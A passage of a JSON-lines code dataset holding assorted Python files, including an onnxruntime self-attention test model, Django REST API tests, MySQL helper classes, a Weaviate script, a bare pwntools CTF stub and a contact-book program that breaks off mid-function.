time1}')\r\n\r\n predResults.append(ck / len(y) * 100)\r\n predResults = pd.Series(predResults, index=[\"Decision Tree\", \"KNN\", \"SVC\", \"K-Means\"], name=\"Score\")\r\n predResults.plot(y=\"Score\",kind=\"bar\")\r\n plt.ylim([0,100])\r\n plt.show()","repo_name":"expresoviter/Predicting-the-presence-of-flight-delays","sub_path":"ML/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21104833914","text":"import numpy as np\nimport onnx\nfrom onnx import GraphProto, OperatorSetIdProto, TensorProto, helper, numpy_helper # noqa: F401\n\nhidden_size = 4\nattention_head = 2\nhidden_per_attention = 2\n\n# Self-attention.\n# Handle self-attension.\n# MatMul->Add->Split->Reshape->Transpose->MatMul->Div->Mul->Sub->Softmax->Dropout->MatMul->Transpose->Reshape->MatMul->Add\n# |->Reshape->Transpose->| |\n# |->Reshape->Transpose------------------------------------------>|\n\nX = helper.make_tensor_value_info(\"input\", TensorProto.FLOAT, [\"batch\", \"seqlen\", hidden_size])\nX_mask = helper.make_tensor_value_info(\"mask\", TensorProto.FLOAT, [\"batch\", 1, \"seqlen\", \"seqlen\"])\nY = helper.make_tensor_value_info(\"output\", TensorProto.FLOAT, [\"batch\", \"seqlen\", hidden_size])\n\nqkv_weight_np_vals = (0.01 * np.arange(hidden_size * (hidden_size * 3), dtype=np.float32)).reshape(\n (hidden_size, hidden_size * 3)\n)\nqkv_weight_initializer = numpy_helper.from_array(\n qkv_weight_np_vals, \"transformer.attention.query_key_value.weight_transposed\"\n)\n\nqkv_bias_np_vals = 0.01 * np.arange(hidden_size * 3, dtype=np.float32)\nqkv_bias_initializer = numpy_helper.from_array(qkv_bias_np_vals, \"transformer.attention.query_key_value.bias\")\n\ndense_weight_np_vals = (0.01 * np.arange(hidden_size * hidden_size, dtype=np.float32)).reshape(\n (hidden_size, hidden_size)\n)\ndense_weight_initializer = numpy_helper.from_array(\n dense_weight_np_vals, \"transformer.attention.dense.weight_transposed\"\n)\n\ndense_bias_np_vals = 0.01 * np.arange(hidden_size, dtype=np.float32)\ndense_bias_initializer = numpy_helper.from_array(dense_bias_np_vals, \"transformer.attention.dense.bias\")\n\nshape_val = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer = numpy_helper.from_array(shape_val, \"concat_shape_0\")\nshape_val1 = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer1 = numpy_helper.from_array(shape_val1, \"concat_shape_1\")\nshape_val2 = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer2 = numpy_helper.from_array(shape_val2, \"concat_shape_2\")\nshape_val3 = np.array([0, 0, hidden_size], dtype=np.int64)\nshape_initializer3 = numpy_helper.from_array(shape_val3, \"concat_shape_3\")\n\nmatmul1 = helper.make_node(\"MatMul\", [\"input\", qkv_weight_initializer.name], [\"matmul1\"], name=\"matmul1\")\nadd1 = helper.make_node(\"Add\", [\"matmul1\", qkv_bias_initializer.name], [\"add1\"], name=\"add1\")\nsplit = helper.make_node(\n \"Split\",\n [\"add1\"],\n [\"mixed_query_layer\", \"mixed_key_layer\", \"mixed_value_layer\"],\n name=\"split\",\n axis=2,\n)\nreshape = helper.make_node(\n \"Reshape\",\n [\"mixed_query_layer\", shape_initializer.name],\n [\"reshape\"],\n name=\"reshape\",\n)\nreshape1 = helper.make_node(\n \"Reshape\",\n [\"mixed_key_layer\", shape_initializer1.name],\n [\"reshape1\"],\n name=\"reshape1\",\n)\nreshape2 = helper.make_node(\n \"Reshape\",\n [\"mixed_value_layer\", shape_initializer2.name],\n [\"reshape2\"],\n name=\"reshape2\",\n)\ntranspose = helper.make_node(\"Transpose\", [\"reshape\"], [\"transpose\"], name=\"transpose\", perm=[0, 2, 1, 3])\ntranspose1 = helper.make_node(\"Transpose\", [\"reshape1\"], [\"transpose1\"], name=\"transpose1\", perm=[0, 2, 3, 1])\ntranspose2 = helper.make_node(\"Transpose\", [\"reshape2\"], [\"transpose2\"], name=\"transpose2\", perm=[0, 2, 1, 3])\nmatmul2 = helper.make_node(\"MatMul\", [\"transpose\", \"transpose1\"], [\"matmul2\"], name=\"matmul2\")\n# Use the mask input for below 3 nodes. This is different from the original GPT-2 model, but it's OK for te sub-graph test.\ndiv = helper.make_node(\"Div\", [\"matmul2\", \"mask\"], [\"div\"], name=\"div\")\nmul = helper.make_node(\"Mul\", [\"div\", \"mask\"], [\"mul\"], name=\"mul\")\nsub = helper.make_node(\"Sub\", [\"mul\", \"mask\"], [\"sub\"], name=\"sub\")\nsoftmax = helper.make_node(\"Softmax\", [\"sub\"], [\"softmax\"], name=\"softmax\", axis=3)\ndropout1 = helper.make_node(\"Dropout\", [\"softmax\"], [\"dropout1\"], name=\"dropout1\")\nmatmul3 = helper.make_node(\"MatMul\", [\"dropout1\", \"transpose2\"], [\"matmul3\"], name=\"matmul3\")\ntranspose3 = helper.make_node(\"Transpose\", [\"matmul3\"], [\"transpose3\"], name=\"transpose3\", perm=[0, 2, 1, 3])\nreshape3 = helper.make_node(\"Reshape\", [\"transpose3\", shape_initializer3.name], [\"reshape3\"], name=\"reshape3\")\nmatmul4 = helper.make_node(\"MatMul\", [\"reshape3\", dense_weight_initializer.name], [\"matmul4\"], name=\"matmul4\")\nadd2 = helper.make_node(\"Add\", [\"matmul4\", dense_bias_initializer.name], [\"add2\"], name=\"add2\")\ndropout2 = helper.make_node(\"Dropout\", [\"add2\"], [\"dropout2\"], name=\"dropout2\")\n# Add dummy Identity so during inference dropout2 can be removed for testing.\nidentity = helper.make_node(\"Identity\", [\"dropout2\"], [\"output\"], name=\"identity\")\n\n# Create the graph (GraphProto)\ngraph_def = helper.make_graph(\n [\n matmul1,\n add1,\n split,\n reshape,\n reshape1,\n reshape2,\n transpose,\n transpose1,\n transpose2,\n matmul2,\n div,\n mul,\n sub,\n softmax,\n dropout1,\n matmul3,\n transpose3,\n reshape3,\n matmul4,\n add2,\n dropout2,\n identity,\n ],\n \"self-attention-megatron-test-model\",\n [X, X_mask],\n [Y],\n [\n qkv_weight_initializer,\n qkv_bias_initializer,\n dense_weight_initializer,\n dense_bias_initializer,\n shape_initializer,\n shape_initializer1,\n shape_initializer2,\n shape_initializer3,\n ],\n)\n\nopsets = []\nonnxdomain = OperatorSetIdProto()\nonnxdomain.version = 12\nonnxdomain.domain = \"\" # The empty string (\"\") or absence of this field implies the operator set that is defined as part of the ONNX specification.\nopsets.append(onnxdomain)\n\nmsdomain = OperatorSetIdProto()\nmsdomain.version = 1\nmsdomain.domain = \"com.microsoft\"\n\nopsets.append(msdomain)\nkwargs = {}\nkwargs[\"opset_imports\"] = opsets\n\n# Create the model (ModelProto)\nmodel_def = helper.make_model(graph_def, producer_name=\"onnx-example\", **kwargs)\nonnx.save(model_def, \"self_attention_megatron_basic_test.onnx\")\n","repo_name":"microsoft/onnxruntime","sub_path":"onnxruntime/test/testdata/transform/model_parallel/self_attention_megatron_basic_test.py","file_name":"self_attention_megatron_basic_test.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":9700,"dataset":"github-code","pt":"18"} +{"seq_id":"27875058188","text":"from sbyieldexception import SBYieldException\n\n\nclass DepositDateAfterLastYieldPaymentError(SBYieldException):\n\t\"\"\"\n\tException raised when the deposit CSV file contains a deposit whose date is after the\n\tlast yield payment date.\n\t\"\"\"\n\tdef __init__(self,\n\t\t\t\t depositCsvFilePathName,\n\t\t\t\t owner,\n\t\t\t\t depositDate,\n\t\t\t\t depositAmount,\n\t\t\t\t yieldPaymentDate):\n\t\terrorMsg = \"CSV file {} contains a deposit of {} for owner {} with a deposit \\\ndate of {} which is after the last payment date of {}\".format(depositCsvFilePathName,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t depositAmount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t owner,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t depositDate,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t yieldPaymentDate)\n\n\t\tsuper(DepositDateAfterLastYieldPaymentError, self).__init__(msg=errorMsg)\n","repo_name":"Archanciel/SByield","sub_path":"depositdateafterlastyieldpaymenterror.py","file_name":"depositdateafterlastyieldpaymenterror.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42589315061","text":"import pandas as pd\nimport mysql.connector\nfrom mysql.connector import Error\nfrom mysql.connector import errorcode\nfrom Volumes import Volumes\nfrom Mysql_connect import Mysql_connect\n\n\nclass Dictionnaires (Volumes): \n\n \n id_dictionnaire=0\n connect = Mysql_connect()\n \n def __init__(self,id_dictionnaire,id_volume=0,auteur=0):\n super().__init__(id_volume,auteur)\n \n\n def getIdDictionnaire(self):\n return self.id_dictionnaire\n \n def setIdDictionnaire (self, id_dictionnaire):\n self.id_dictionnaire = id_dictionnaire\n \n \n \n def creer_dictionnaire(self,id_volume):\n try :\n \n cnx = self.connect.connexion()\n \n if (cnx.is_connected()):\n print('is connected')\n \n cursor = cnx.cursor()\n \n \n requete = ('insert into dictionnaires (id_volume) values (%s);') \n values = (id_volume)\n print(requete,values)\n cursor.execute(requete,values) \n\n \n \n cnx.commit()\n cursor.close()\n \n \n cnx.close()\n\n except mysql.connector.Error as error:\n print(\"Failed to insert record {}\".format(error))\n\n \n \n # def modifier_dictionnaire(self,id_journaux,date_de_parution):\n # try :\n \n # cnx = self.connect.connexion()\n \n # if (cnx.is_connected()):\n # print('is connected')\n \n # cursor = cnx.cursor()\n \n \n # requete = ('update journaux set date_de_parution = %s where id_journ = %s;') \n # values = (date_de_parution,id_journaux)\n # print(requete,values)\n # cursor.execute(requete,values) \n\n # cnx.commit()\n # cursor.close()\n \n # cnx.close()\n\n # except mysql.connector.Error as error:\n # print(\"Failed to update record {}\".format(error))\n\n # \n \n # def supprimer_journaux(self,id_journaux):\n # try :\n \n # cnx = self.connect.connexion()\n \n # if (cnx.is_connected()):\n # print('is connected')\n \n # cursor = cnx.cursor()\n \n \n # requete = ('delete from journaux where id_journ = %s;') \n # values = (id_journaux)\n # print(requete,values)\n # cursor.execute(requete,values) \n\n # cnx.commit()\n # cursor.close()\n \n # cnx.close()\n\n # except mysql.connector.Error as error:\n # print(\"Failed to delete record {}\".format(error))\n\n # \n \n def liste_dictionnaires (self) :\n \n try :\n \n cnx = self.connect.connexion()\n \n if (cnx.is_connected()):\n print('is connected')\n\n cursor = cnx.cursor()\n\n cursor.execute('select * from dictionnaires;')\n\n \n row = cursor.fetchall()\n result = pd.DataFrame(row)\n\n print(result)\n \n cursor.close() \n cnx.close()\n \n except mysql.connector.Error as error:\n print(\"Failed to select record {}\".format(error))\n\n \n","repo_name":"Damosm/Bibliotheque","sub_path":"Dictionnaire.py","file_name":"Dictionnaire.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22548788156","text":"import os.path\n\nimport mock\n\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APITestCase\n\n\ndef authenticate(client, username=None, token=None):\n if token is None:\n token = Token.objects.get(user__username=username).key\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n\nclass APIv1Tests(APITestCase):\n fixtures = ['complete.json']\n\n\nclass APIv1RepositoryTests(APIv1Tests):\n list_url = '/api/v1/repositories/'\n\n def test_fetch_sources(self):\n # Use user brandon to make sure it works with users who are members\n # of multiple groups\n authenticate(self.client, 'brandon')\n response = self.client.get(self.list_url)\n\n for repo in response.data['results']:\n resp = self.client.get(repo['sources'])\n self.assertEquals(resp.status_code, 200)\n\n def test_fetch_external_dependencies(self):\n # Use brandon to make sure it works with users who are members\n # of multiple groups\n authenticate(self.client, 'brandon')\n response = self.client.get(self.list_url)\n\n for repo in response.data['results']:\n resp = self.client.get(repo['external_dependencies'])\n self.assertEquals(resp.status_code, 200)\n\n def test_create_repository_empty_fails_400(self):\n data = {}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'name': ['This field is required.']})\n\n def test_create_repository_no_auth_fails_401(self):\n data = {}\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 401)\n\n def test_create_repository_incorrect_auth_fails_401(self):\n data = {}\n authenticate(self.client, token='invalidtoken')\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 401)\n\n def test_create_repository(self):\n data = {'name': 'testrepo'}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n expected_result = {'external_dependencies': response.data['self'] + 'external_dependencies/',\n 'name': 'testrepo',\n 'binary_source_list': 'deb http://127.0.0.1:8000/apt/eric/testrepo aasemble main',\n 'source_source_list': 'deb-src http://127.0.0.1:8000/apt/eric/testrepo aasemble main',\n 'self': response.data['self'],\n 'sources': response.data['self'] + 'sources/',\n 'user': 'eric',\n 'key_id': u''}\n\n self.assertEquals(response.data, expected_result)\n response = self.client.get(response.data['self'])\n self.assertEquals(response.data, expected_result)\n return response.data\n\n def test_create_duplicate_repository(self):\n data = {'name': 'testrepo'}\n authenticate(self.client, 'eric')\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 201)\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 409)\n\n def test_delete_repository(self):\n repo = self.test_create_repository()\n\n response = self.client.delete(repo['self'])\n\n self.assertEquals(response.status_code, 204)\n\n response = self.client.get(repo['self'])\n self.assertEquals(response.status_code, 404)\n\n def test_patch_repository(self):\n repo = self.test_create_repository()\n data = {'name': 'testrepo2'}\n\n response = self.client.patch(repo['self'], data, format='json')\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(response.data['self'], repo['self'], '\"self\" attribute changed')\n\n expected_result = {'external_dependencies': response.data['self'] + 'external_dependencies/',\n 'name': 'testrepo2',\n 'binary_source_list': 'deb http://127.0.0.1:8000/apt/eric/testrepo2 aasemble main',\n 'source_source_list': 'deb-src http://127.0.0.1:8000/apt/eric/testrepo2 aasemble main',\n 'self': response.data['self'],\n 'sources': response.data['self'] + 'sources/',\n 'user': 'eric',\n 'key_id': u''}\n\n self.assertEquals(response.data, expected_result)\n\n response = self.client.get(response.data['self'])\n self.assertEquals(response.data, expected_result, 'Changes were not persisted')\n\n def test_patch_repository_read_only_field(self):\n repo = self.test_create_repository()\n data = {'user': 'testuser2'}\n\n self.client.patch(repo['self'], data, format='json')\n\n def test_delete_deleted_repository(self):\n repo = self.test_create_repository()\n\n response = self.client.delete(repo['self'])\n\n self.assertEquals(response.status_code, 204)\n\n response = self.client.delete(repo['self'])\n\n self.assertEquals(response.status_code, 404)\n\n def test_delete_repository_invalid_token(self):\n repo = self.test_create_repository()\n authenticate(self.client, token='invalidtoken')\n response = self.client.delete(repo['self'])\n self.assertEquals(response.status_code, 401)\n\n def test_delete_repository_other_user(self):\n repo = self.test_create_repository()\n authenticate(self.client, 'aaron')\n response = self.client.delete(repo['self'])\n self.assertEquals(response.status_code, 404)\n\n def test_delete_repository_super_user(self):\n repo = self.test_create_repository()\n authenticate(self.client, 'george')\n response = self.client.delete(repo['self'])\n self.assertEquals(response.status_code, 204)\n\n\nclass APIv2RepositoryTests(APIv1RepositoryTests):\n list_url = '/api/v2/repositories/'\n\n\nclass APIv1BuildTests(APIv1Tests):\n list_url = '/api/v1/builds/'\n\n def test_fetch_builds(self):\n # Use alterego2 to make sure it works with users who are members\n # of multiple groups\n authenticate(self.client, 'eric')\n response = self.client.get(self.list_url)\n self.assertEquals(response.status_code, 200)\n\n\nclass APIv2BuildTests(APIv1BuildTests):\n list_url = '/api/v2/builds/'\n\n\nclass APIv1SourceTests(APIv1Tests):\n list_url = '/api/v1/sources/'\n\n def test_create_source_empty_fails_400(self):\n data = {}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'git_repository': ['This field is required.'],\n 'git_branch': ['This field is required.'],\n 'repository': ['This field is required.']})\n\n def test_create_invalied_url_fails_400(self):\n data = {'git_repository': 'not a valid url'}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'git_repository': ['Enter a valid URL.'],\n 'git_branch': ['This field is required.'],\n 'repository': ['This field is required.']})\n\n def test_create_source_no_auth_fails_401(self):\n data = {}\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 401)\n\n def test_create_source_incorrect_auth_fails_401(self):\n data = {}\n authenticate(self.client, token='invalidtoken')\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 401)\n\n def test_create_source(self):\n authenticate(self.client, 'eric')\n\n response = self.client.get(self.list_url.replace('sources', 'repositories'))\n\n data = {'git_repository': 'https://github.com/sorenh/buildsvctest',\n 'git_branch': 'master',\n 'repository': response.data['results'][0]['self']}\n\n response = self.client.post(self.list_url, data, format='json')\n\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n data['self'] = response.data['self']\n data['builds'] = data['self'] + 'builds/'\n self.assertEquals(response.data, data)\n\n response = self.client.get(data['self'])\n self.assertEquals(response.data, data)\n return response.data\n\n def test_delete_source(self):\n source = self.test_create_source()\n\n response = self.client.delete(source['self'])\n\n self.assertEquals(response.status_code, 204)\n\n response = self.client.get(source['self'])\n self.assertEquals(response.status_code, 404)\n\n\nclass APIv2SourceTests(APIv1SourceTests):\n list_url = '/api/v2/sources/'\n\n\nclass APIv1AuthTests(APIv1Tests):\n self_url = '/api/v1/auth/user/'\n\n def test_get_user_details(self):\n authenticate(self.client, 'eric')\n\n response = self.client.get(self.self_url, format='json')\n self.assertEquals(response.status_code, 200)\n self.assertEquals(response.data,\n {'username': u'eric',\n 'company': u'No Company',\n 'email': u'eric@example.com',\n 'avatar': u'https://avatars.githubusercontent.com/u/1234565?v=3',\n 'real_name': u'Eric Ericson'})\n\n\nclass APIv2AuthTests(APIv1AuthTests):\n self_url = '/api/v2/auth/user/'\n\n\nclass APIv1MirrorTests(APIv1Tests):\n list_url = '/api/v1/mirrors/'\n\n def test_create_mirror_empty_fails_400(self):\n data = {}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'url': ['This field is required.'],\n 'series': ['This field is required.'],\n 'components': ['This field is required.']})\n\n def test_create_mirror_invalid_url_fails(self):\n data = {'url': 'not-a-url',\n 'series': ['trusty'],\n 'components': ['main']}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 400)\n self.assertEquals(response.data, {'url': ['Enter a valid URL.']})\n\n def test_create_mirror(self):\n data = {'url': 'http://example.com/',\n 'series': ['trusty'],\n 'components': ['main']}\n authenticate(self.client, 'eric')\n\n response = self.client.post(self.list_url, data, format='json')\n self.assertEquals(response.status_code, 201)\n self.assertTrue(response.data['self'].startswith('http://testserver' + self.list_url), response.data['self'])\n data['self'] = response.data['self']\n data['refresh_in_progress'] = False\n data['public'] = False\n self.assertEquals(data, response.data)\n return response.data\n\n @mock.patch('aasemble.django.apps.mirrorsvc.tasks.refresh_mirror')\n def test_refresh_mirror(self, refresh_mirror):\n mirror = self.test_create_mirror()\n self.client.post(mirror['self'] + 'refresh/')\n self.assertTrue(refresh_mirror.delay.call_args_list)\n\n\nclass APIv2MirrorTests(APIv1MirrorTests):\n list_url = '/api/v2/mirrors/'\n\n\nclass GithubHookViewTestCase(APIv1Tests):\n @mock.patch('aasemble.django.apps.api.tasks.github_push_event')\n def test_hook(self, github_push_event):\n with open(os.path.join(os.path.dirname(__file__), 'example-hook.json'), 'r') as fp:\n res = self.client.post('/api/events/github/',\n data=fp.read(),\n content_type='application/json',\n HTTP_X_GITHUB_EVENT='push')\n self.assertEquals(res.data, {'ok': 'thanks'})\n github_push_event.delay.assert_called_with(\"https://github.com/baxterthehacker/public-repo\")\n\n @mock.patch('aasemble.django.apps.buildsvc.tasks.poll_one')\n def test_github_push_event(self, poll_one):\n from .tasks import github_push_event\n github_push_event(\"https://github.com/eric/project0\")\n poll_one.delay.assert_called_with(1)\n","repo_name":"anand0707/overcastCloudTests","sub_path":"aasemble/django/apps/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":13136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41774344509","text":"from pwn import *\ncontext(arch=\"amd64\",os=\"linux\",terminal=[\"tmux\",\"splitw\",\"-h\"],log_level=\"debug\")\nGDB = args[\"GDB\"]\np= process(\"./timu\",env={\"LD_PRELOAD\":\"./libc-2.23.so\"})\n\nif GDB==\"1\":\n gdb.attach(p)\n\nprint(p.recv())\npause()\n","repo_name":"go1me/ctf","sub_path":"xctf/pwn/Noleak/noleak.py","file_name":"noleak.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73842317799","text":"# -*- coding: utf-8 -*-\n'''df'''\nimport math\n\ndef featprob(bayes, feature, category):\n '''df'''\n if category not in bayes.class_count:\n return -1e300\n if (feature, category) not in bayes.feature_count:\n wynik = (math.log(float(0.001)/float(bayes.class_count[category])))\n return wynik\n wynik = float(bayes.feature_count[(feature, category)])\n wynik = math.log(wynik/float(bayes.class_count[category]))\n return wynik\n","repo_name":"grzekru/hakaton2","sub_path":"classifier/Task902.py","file_name":"Task902.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7818843122","text":"\"\"\"Hypothesis search strategies.\"\"\"\n\nfrom typing import Optional, TypeVar\n\nimport hypothesis.strategies as st\n\nT = TypeVar('T') # pylint: disable=invalid-name\n\n\ndef optionals(strategy: st.SearchStrategy[T]) -> st.SearchStrategy[Optional[T]]:\n \"\"\"Generate an optional strategy.\"\"\"\n return st.one_of(\n st.none(), strategy\n )\n\n\ndef int64s(\n min_value: int = -(2 ** 63),\n max_value: int = (2 ** 63) - 1\n) -> st.SearchStrategy[int]:\n \"\"\"Generate an int64.\"\"\"\n if min_value > max_value:\n raise TypeError('min_value must be less than or equal max_value.')\n if min_value < -(2 ** 63):\n raise TypeError(f'min_value must be greater than or equal to {-(2 ** 63)}.')\n if min_value > (2 ** 63) - 1:\n raise TypeError(f'min_value must be less than or equal to {(2 ** 63) - 1}.')\n if max_value < -(2 ** 63):\n raise TypeError(f'max_value must be greater than or equal to {-(2 ** 63)}.')\n if max_value > (2 ** 63) - 1:\n raise TypeError(f'max_value must be less than or equal to {(2 ** 63) - 1}.')\n return st.integers(\n min_value,\n max_value\n )\n\n\ndef uint64s(\n min_value: int = 0,\n max_value: int = (2 ** 64) - 1\n) -> st.SearchStrategy[int]:\n \"\"\"Generate a uint64.\"\"\"\n if min_value > max_value:\n raise TypeError('min_value must be less than or equal to max_value.')\n if min_value < 0:\n raise TypeError('min_value must be greater than or equal to 0.')\n if min_value > (2 ** 64) - 1:\n raise TypeError(f'min_value must be less than or equal to {(2 ** 64) - 1}.')\n if max_value < 0:\n raise TypeError('max_value must be greater than or equal to 0.')\n if max_value > (2 ** 64) - 1:\n raise TypeError(f'max_value must be less than or equal to {(2 ** 64) - 1}.')\n return st.integers(\n min_value,\n max_value\n )\n","repo_name":"higherorderfunctor/snmp-stream","sub_path":"tests/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72670174440","text":"import json\n\nimport weaviate\nfrom dependency_injector.wiring import inject, Provide\n\nfrom ai_document_search_backend.container import Container\n\n\ndef get_batch_with_cursor(client, class_name, class_properties, batch_size, cursor=None):\n query = (\n client.query.get(class_name, class_properties)\n .with_additional([\"id\"])\n .with_limit(batch_size)\n )\n\n if cursor is not None:\n return query.with_after(cursor).do()\n else:\n return query.do()\n\n\ndef get_number_of_objects(client: weaviate.Client, class_name: str) -> int:\n \"\"\"\n Source: https://weaviate.io/developers/weaviate/manage-data/read-all-objects\n \"\"\"\n\n cursor = None\n aggregate_count = 0\n while True:\n results = get_batch_with_cursor(\n client, class_name=class_name, class_properties=[], batch_size=100, cursor=cursor\n )\n # If empty, we're finished\n if len(results[\"data\"][\"Get\"][class_name]) == 0:\n break\n\n objects_list = results[\"data\"][\"Get\"][class_name]\n aggregate_count += len(objects_list)\n\n # Update the cursor to the id of the last retrieved object\n cursor = results[\"data\"][\"Get\"][class_name][-1][\"_additional\"][\"id\"]\n return aggregate_count\n\n\ndef print_schema(client, class_name: str) -> None:\n print(json.dumps(client.schema.get(class_name), indent=2))\n\n\n@inject\ndef main(\n client: weaviate.Client = Provide[Container.weaviate_client],\n class_name: str = Provide[Container.config.weaviate.class_name],\n) -> None:\n number_of_objects = get_number_of_objects(client, class_name)\n print(f\"Number of objects: {number_of_objects}\")\n\n print_schema(client, class_name)\n\n\nif __name__ == \"__main__\":\n container = Container()\n container.init_resources()\n container.wire(modules=[__name__])\n\n main()\n","repo_name":"petr7555/ai-document-search-backend","sub_path":"ai_document_search_backend/scripts/observability.py","file_name":"observability.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38861432455","text":"import mysql.connector\r\n\r\n# Connector to communicate with the MySQL database\r\ndb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"*********\",\r\n database=\"contactBook\"\r\n)\r\n\r\ncursor = db.cursor()\r\n\r\n# Code to create the database initially\r\n# cursor.execute(\"CREATE DATBASE contactBook\")\r\n\r\n#Code to create the table initially\r\n# cursor.execute(\"CREATE TABLE Contacts (personID int PRIMARY KEY AUTO_INCREMENT, firstName VARCHAR(50), lastName VARCHAR(50), number VARCHAR(15), email VARCHAR(100))\")\r\n\r\n# A display menu to enable user to interact with the program\r\ndef displayMenu():\r\n action = input('Contact Book\\nChoose one of the following actions to perform\\n1. Add a contact\\n2. View all Contacts\\n3. Search for a contact\\n4. Delete a contact\\n5. Edit a contact\\n6. Exit\\n\\nPlease enter the number associated with the actions: ')\r\n print()\r\n if action == '1':\r\n addContact()\r\n elif action == '2':\r\n printAllContacts()\r\n elif action == '3':\r\n searchContact()\r\n elif action == '4':\r\n deleteContact()\r\n elif action == '5':\r\n editContact()\r\n elif action == '6':\r\n exit()\r\n\r\n# Function to add a contact to the contact book\r\ndef addContact():\r\n print(\"Please provide the following details to add a contact.\")\r\n firstName = input(\"First Name: \")\r\n lastName = input(\"Last Name: \")\r\n number = input(\"Phone Number: \")\r\n email = input(\"Email: \")\r\n\r\n cursor.execute(\"INSERT INTO Contacts (firstName, lastName, number, email) Values (%s, %s, %s, %s)\", (firstName, lastName, number, email))\r\n db.commit()\r\n print()\r\n print(\"Contact added succesfully.\")\r\n print()\r\n\r\n# Function to view all contacts\r\ndef printAllContacts():\r\n cursor.execute(\"SELECT * FROM Contacts\")\r\n count = 0\r\n for contact in cursor:\r\n count+=1\r\n if count == 0:\r\n print(\"No contacts found.\")\r\n else:\r\n cursor.execute(\"SELECT * FROM Contacts\")\r\n for contact in cursor:\r\n print(contact)\r\n print()\r\n\r\n# Function to search for a contact\r\ndef searchContact():\r\n action = input('Search Using: \\n1. First Name\\n2. Last Name\\n3. Phone Number\\n4. Email\\nPlease enter the number associated with the actions: ')\r\n print()\r\n if action == '1':\r\n searchTerm = input('Please enter the first name: ')\r\n cursor.execute(\"Select * FROM Contacts WHERE firstName = %s\", (searchTerm, ))\r\n elif action == '2':\r\n searchTerm = input('Please enter the last name: ')\r\n cursor.execute(\"Select * FROM Contacts WHERE lastName = %s\", (searchTerm, ))\r\n elif action == '3':\r\n searchTerm = input('Please enter the number: ')\r\n cursor.execute(\"Select * FROM Contacts WHERE number = %s\", (searchTerm, ))\r\n elif action == '4':\r\n searchTerm = input('Please enter the email: ')\r\n cursor.execute(\"Select * FROM Contacts WHERE email = %s\", (searchTerm, ))\r\n count = 0\r\n for contact in cursor:\r\n count+=1\r\n if count == 0:\r\n print(\"No contacts found.\")\r\n else:\r\n cursor.execute(\"SELECT * FROM Contacts\")\r\n for contact in cursor:\r\n print(contact)\r\n print()\r\n\r\n# Function to delete a contact\r\ndef deleteContact():\r\n print(\"How would you like to search for the contact to delete?\")\r\n searchContact()\r\n searchTerm = int(input(\"Please input the number associated with the contact you wish to delete: \"))\r\n cursor.execute(\"DELETE FROM Contacts WHERE personID = %s\", (searchTerm, ))\r\n db.commit()\r\n print(\"Contact deleted succesfully.\")\r\n print()\r\n\r\n# Function to edit a contact\r\ndef editContact():\r\n print(\"How would you like to search for the contact to edit?\")\r\n searchContact()\r\n contactID = int(input(\"Please input the number associated with the contact you wish to edit: \"))\r\n print()\r\n detail = input('Select the contact detail you would like to update: \\n1. First Name\\n2. Last Name\\n3. Phone Number\\n4. Email\\nPlease enter the number associated with the detail: ')\r\n value = input(\"Please enter the new value for the detail: \")\r\n\r\n if detail == '1':\r\n cursor.execute(\"UPDATE Contacts SET firstName = %s WHERE personID = %s\", (value, contactID))\r\n elif detail == '2':\r\n 